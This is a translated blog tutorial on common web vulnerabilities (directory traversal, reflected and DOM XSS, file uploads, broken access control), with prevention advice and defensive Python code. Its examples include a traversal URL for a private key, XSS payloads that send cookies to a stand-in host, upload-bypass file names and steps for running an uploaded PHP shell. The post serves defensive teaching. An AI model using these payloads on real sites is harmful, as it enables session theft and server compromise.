Basic hacking techniques programmers should know – Part 2

Tram Ho


Directory Traversal

A vulnerability that lets an attacker read files on the server, most commonly through the URL, whether via a query parameter or a direct path.

For example, you have the URL foodle.com/menus?menu=menu.pdf. The attacker changes it to foodle.com/menus?menu=../../../../ssl/private.key, and the server's private key is served to them; the home server is finished, my friend.

Or, the easiest case to spot: you have a file URL (usually an image) such as foodle.com/upload/images/menu/menu2nd.png. The attacker trims it to foodle.com/upload/images, and the whole three-generation family tree of menu2nd.png is listed right in front of them.

Prevention

1. Use the content management system

If you manage many files, using a third-party system to handle them is a business decision; it may cost an annual fee, but the problem is no longer something you have to worry about.

2. File redirection

Instead of exposing the direct path to the file, serve it through an API or a generic controller that looks the file up for you, and remember to validate the input.

3. Separate documents

Separate documents by type: shared, user, admin, and so on. You can then assign access rights per category, so even if an attacker works out the path, without the matching permission they still cannot get at the information.
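As an added example of point 2 (this is not code from the original post), a server-side check in Python that maps the ?menu= value from the foodle.com example onto one fixed directory and refuses anything that escapes it; the MENU_ROOT path and the function name are assumptions.

```python
import os
import posixpath
from urllib.parse import unquote

# Constructed for this example: the directory that holds the menu files.
MENU_ROOT = "/srv/foodle/menus"


def resolve_menu_path(requested, root=MENU_ROOT):
    """Map a user-supplied ?menu= value to an absolute path inside root.

    Returns the safe absolute path, or None when the request escapes root.
    The check works on the normalised string, so it does not need the files
    to exist; a real handler would additionally use os.path.realpath so that
    symlinks inside root cannot point outside it.
    """
    # Decode percent-encoding the way the web server would (%2e%2e -> ..).
    name = unquote(requested)
    # A NUL byte is never legitimate in a file name; some runtimes truncate
    # the path at it, so reject outright.
    if "\x00" in name:
        return None
    # Treat backslashes as separators too, as a Windows host would.
    name = name.replace("\\", "/")
    # Absolute paths are never an acceptable menu name.
    if name.startswith("/"):
        return None
    # Collapse ./ and ../ segments, then re-anchor the result under root.
    candidate = os.path.normpath(os.path.join(root, posixpath.normpath(name)))
    # Containment check on whole path segments: "/srv/foodle/menus2" is
    # not inside "/srv/foodle/menus", which a plain startswith() would miss.
    if os.path.commonpath([root, candidate]) != root:
        return None
    # The root itself is a directory listing, not a menu file.
    if candidate == root:
        return None
    return candidate
```

The same idea applies to the image URL case: the controller never hands the raw request string to the filesystem, and a request that resolves to a directory is refused instead of listed.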

Reflected XSS

Most XSS in practice is reflected XSS. The attacker does not send malicious data to the victim's server; instead they send the user a link that contains the malicious code, and when the user clicks it, the page is loaded together with the malicious script. Reflected XSS is typically used to steal cookies, hijack sessions and the like, or to plant keyloggers, trojans and so on on the victim's computer.

For example: the victim has an account and is logged in to the website welp.com.

The attacker sends the victim a link like this: www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>

When the victim clicks it, welp.com opens and runs a search for <script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>

The script executes, reads the cookie, and navigates to the attacker's site with the cookie in the query parameter.

So the attacker can now use welp.com as that user without ever knowing the password.

Prevention

1. Validate input

Very simple and extremely effective: encode all special characters so they are displayed as HTML entities rather than markup, and use a whitelist that defines which characters are allowed in the input. Easy game.

2. Use a Content-Security-Policy

You can add this meta tag to your head
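An added example of prevention point 1 (not code from the original post): a Python search handler for the welp.com case that whitelists the search term and HTML-encodes it on output, so the post's payload is rendered as harmless text. The page template, the allowed-character set and the function names are assumptions.

```python
import html
import re

# Constructed example page: the search term is reflected into the heading,
# which is exactly where the <script> payload from the example lands.
PAGE_TEMPLATE = "<h1>Results for: {term}</h1>"

# Whitelist of characters a search term may contain (an assumption for this
# example: letters, digits, spaces and a few punctuation marks, 1-100 long).
ALLOWED_TERM = re.compile(r"^[\w .,'-]{1,100}$")


def is_allowed_search(term):
    """Whitelist check: anything that is not a plain search phrase is rejected."""
    return ALLOWED_TERM.fullmatch(term) is not None


def render_search_page(term):
    """Reflect the term into the page, but only as HTML-escaped text.

    html.escape turns < > & " ' into entities, so even if the whitelist is
    skipped (or a field legitimately needs those characters) the browser
    shows the payload as literal text instead of executing it.
    """
    return PAGE_TEMPLATE.format(term=html.escape(term, quote=True))


def handle_search(term):
    """Combined policy: whitelist first, and encode on output regardless.

    Returns (body, http_status). The rejected input is never echoed back.
    """
    if not is_allowed_search(term):
        return "<h1>Invalid search term</h1>", 400
    return render_search_page(term), 200
```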

DOM-based XSS

This bug looks exactly like the one above as far as the script is concerned, but in essence it is a bit different:

  • Reflected XSS: when the victim clicks the link containing the malicious code, the server receives the code as a request parameter and sends it back to the victim as a valid part of the page content.
  • DOM-based XSS: the page always receives the full URL and renders it in the browser, without the payload ever being sent to the server. It still hijacks your session and cookies, so no need to worry =)))

The attack looks like this:

Say you have a page with infinite scroll. Normally, as you scroll and more content is loaded, the URL becomes www.chinterest.com#1, www.chinterest.com#2, and so on.

The code that loads the page data looks like this:

The attacker takes advantage of this and replaces the part after the # => www.chinterest.com#<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>

The browser then reads the fragment as if it were a legitimate script of the page and executes it.

Prevention

1. Use a JavaScript framework
2. Examine your code carefully
3. Parse JSON carefully
4. Use development tools to detect unsafe code
5. Do not use URI fragments
6. Use a Content-Security-Policy

File Upload security vulnerabilities

The attacker uploads a malicious file to the server and then calls it, either through the application's normal API or directly via a directory traversal bug, so that it executes. From there they can hijack your server, or force your clients to download files, read code, or do other dangerous things. It is regularly in the top 10 security bugs.

  1. Create the file hack.php
  2. Upload it as an avatar
  3. Open the uploaded "avatar" file
  4. Execute commands and see the whole thing, with nothing left covered
  5. Teach the victim how to cry, just for the sake of crying

PHP is not the only dangerous file type: extensions like .php1, .php2, .php3 ... or .lp, .cgi; sometimes just a change of case such as .PHP, .PHP1, ...; a double extension like image.jpg.php; even .htaccess.

Prevention

1. Store uploaded files separately
2. Make sure uploaded files cannot be executed
3. Rename the file after uploading
4. Validate the file format and extension

   Using a whitelist is less painful, but there are ways to bypass it:

     • Null byte injection: shell.php%00.jpg
     • Double extension: shell.php.jpg, shell.php;.jpg, shell.php:jpg
     • Invalid extension bypass

5. Validate the Content-Type header
6. Use a virus scan

You can find more information about this bug here.
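An added example (not from the original post) of prevention points 3 and 4 in Python: a single-extension whitelist that refuses the null-byte and double-extension names listed above, a magic-byte check instead of trusting the client's Content-Type, and a random server-chosen name for storage. The allowed types, their signatures and the name rules are assumptions for this example.

```python
import re
import secrets

# Whitelisted extensions and the leading bytes each must start with
# (constructed for this example; extend per application).
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# A name may contain exactly one dot, name.ext, both parts from safe characters.
# That alone rejects shell.php.jpg, shell.php;.jpg, shell.php:jpg, .htaccess
# and image.jpg.php.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")


def check_upload(filename, content):
    """Return (ok, reason_or_stored_name) for one uploaded file.

    filename is the name as the server receives it after URL decoding, so
    shell.php%00.jpg has already become 'shell.php\\x00.jpg' at this point.
    """
    # NUL bytes and path separators are never legitimate in an upload name.
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return False, "illegal character in file name"
    m = SAFE_NAME.match(filename)
    if not m:
        return False, "file name must be name.ext with a single extension"
    # Case-insensitive: .PHP, .PNG and .Png all normalise the same way.
    ext = m.group(1).lower()
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED:
        return False, "extension not allowed"
    # Trust the bytes, not the extension or the Content-Type header.
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    # Point 3: the attacker never controls the stored name or its extension.
    return True, secrets.token_hex(16) + "." + ext
```

The returned name is what goes on disk, in the separate non-executable upload directory from points 1 and 2; the original name is at most kept as metadata.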

Broken Access Control

This bug occurs when the user's access control is not strictly managed, so a user can access information or perform actions beyond their authority, such as viewing or editing other users' information. It is also a common entry in the OWASP Top 10, and in general the subject of authorization is quite complicated.

Prevention

There is no single solution that fits every situation where this bug appears, but in general we should focus on the following three aspects.

1. Authentication

Correctly confirm who the user of the application is.

2. Authorization

Decide what a user may and may not do once they are authenticated.

3. Check permissions

Check permissions when the user wants to perform a certain action.
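An added example (not from the original post) that puts the three aspects together in Python for the "editing another user's information" case: an unauthenticated actor is refused, the authorization rule is owner-or-admin, and the check runs inside the handler at the moment of the action rather than trusting the id in the URL. The User type, roles, sample profiles and function names are assumptions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str  # "user" or "admin" (constructed roles for this example)


# Constructed example records: each profile is owned by one user id.
PROFILES = {101: {"owner": 1, "name": "alice"}, 102: {"owner": 2, "name": "bob"}}


class Forbidden(Exception):
    """Raised whenever a request is refused; the message is deliberately generic."""


def authorize(actor, action, profile_id):
    """Aspect 3: check permission at the moment of the action.

    - actor is None      -> not authenticated (aspect 1 not satisfied), deny
    - admin              -> may do anything (aspect 2 rule)
    - view / edit        -> only the profile's owner (aspect 2 rule)
    - unknown profile id -> same generic error, so ids cannot be probed
    """
    if actor is None:
        raise Forbidden("authentication required")
    profile = PROFILES.get(profile_id)
    if profile is None:
        raise Forbidden("not allowed")
    if actor.role == "admin":
        return True
    if action in ("view", "edit") and profile["owner"] == actor.id:
        return True
    raise Forbidden("not allowed")


def can(actor, action, profile_id):
    """Boolean form of authorize() for templates and tests."""
    try:
        return authorize(actor, action, profile_id)
    except Forbidden:
        return False


def edit_profile(actor, profile_id, new_name):
    """Every state-changing handler authorizes first; profile_id comes from the URL."""
    authorize(actor, "edit", profile_id)
    PROFILES[profile_id]["name"] = new_name
    return PROFILES[profile_id]
```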


Source : Viblo